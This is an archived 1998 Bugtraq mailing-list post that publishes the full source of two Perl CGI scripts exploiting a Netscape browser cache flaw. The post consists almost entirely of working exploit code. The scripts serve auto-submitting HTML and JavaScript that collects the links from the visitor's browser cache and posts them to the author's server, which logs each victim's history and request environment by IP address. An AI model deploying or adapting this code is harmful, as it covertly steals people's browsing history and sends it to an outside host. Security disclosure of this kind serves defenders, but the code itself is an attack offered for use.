BSD, Linux, Cisco, Web, Palm, other unix RUSSIAN version Search:  Новость: Руководство по установке Linux дистрибутива Дженту (Gentoo) SOFT - Unix Software catalog LINKS - Unix resources TOPIC - Articles from usenet DOCUMENTATION - Unix guides News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Tue, 29 Sep 1998 13:26:22 -0400
From: Ken Williams <jkwilli2@UNITY.NCSU.EDU>
To: BUGTRAQ@netspace.org
Subject: Netscape Cache Exploit - source code

Hi,

Below is source code for the two versions of the Netscape Cache
exploit that was recently discovered by Dan Brumleve
<nothing@shout.net>, as found on his web site at
http://www.shout.net/~nothing/cache-cow/index.html

First version <cache-cow.cgi>, and then second version
<view-cache-cow-4.06.cgi> listed.

-----snip-----
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothing@shout.net>, 1998.08.23

my $self = "http://www.shout.net/nothing/cache-cow.cgi";

if ($ENV{PATH_INFO}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  (my$url=<<"  EOF")=~s/  |\n//g;print"Location: $url\n\n";
  $self/></a></body><script>function chunk(s){return("href=
  "+escape(s));}function moo(){if(!document.links.length){r
  eturn("");}var str=chunk(document.links[0]);var i=documen
  t.links.length;while(--i){str+="&"+chunk(document.links[i
  ]);}return(str);}</script><body onLoad="document.f.cache.
  value=moo();document.f.submit()"><form action="$self" nam
  e=f method=post><input type=hidden name=cache><input type
  =submit></form><a href=$self
  EOF
}

exit 0;
-----snip-----


-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothing@shout.net>, 1998.09.26

my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";

if ($ENV{QUERY_STRING}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><head><script>function chunk(s){return("href=" + escape(s));}
  function moo(d){if(!d.l  inks.length){return("");} var str=chunk(d.
  links[0]);var i=d.links.length;wh  ile(--i){str+="&"+chunk(d.links[
  i]);} return(s  tr);}function check(){ var m=moo(top.cache.document
  ); if (m=="") { docume  nt.location.reload(); return; }document.f.c
  ache.value=m;doc  ument.f.submit();}</script></head><body onLoad="c
  heck()"><form acti  on="$self" name=f target=_top method=post><inpu
  t type=hidden name=cac  he><input type=submit></form></body></html>
  EOF
} elsif ($ENV{PATH_INFO}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  print"Content-type: text/html\n\n".<<"  EOF";
  <html><head> <frameset rows="1,*"><frame src=
  "$self?cow" name=cow><frame src="$self/cache"
  name=cache></frameset></head></html>
  EOF
}

exit 0;
-----snip-----


--
Ken Williams

Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml
E.H.A.P. Corporation  http://www.ehap.org/  ehap@ehap.org info@ehap.org
NCSU Comp Sci Dept    http://www.csc.ncsu.edu/ jkwilli2@adm.csc.ncsu.edu
PGP DSS/DH/RSA Keys   http://www4.ncsu.edu/~jkwilli2/pgpkey/

__________________________________________________
Get Your Private, Free Email at http://www.nsa.gov

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Быстрая навигация по сайту __________________ КАТАЛОГИ: Каталог программного обеспечения Каталог ссылок на unix ресурсы Каталог тематических статей Архив документации Советы, заметки MAN - Системные руководства __________________ НОВОСТИ: Новости OpenNews LastSoft - Свежий софт Обзоры ПО с freshmeat Проблемы безопасности Новости с других сайтов __________________ ОБЩЕНИЕ: Форум/Конферения _______________ МИНИ-ПОРТАЛЫ: CISCO.opennet.ru BSD.opennet.ru LINUX.opennet.ru SOLARIS.opennet.ru WEB.opennet.ru - web-технологии SECURITY.opennet.ru PALM.opennet.ru - карманные ПК __________________ НАВИГАЦИЯ: Навигация по ключевым словам Системы ПОИСКА __________________ РАЗНОЕ: ЦУП - Центр Управления Проектом Добавление в каталоги Закладки Добавить в закладки Created 1996-2003 by Maxim Chirkov   Добавить, Реклама, Вебмастеру, ЦУП, ГИД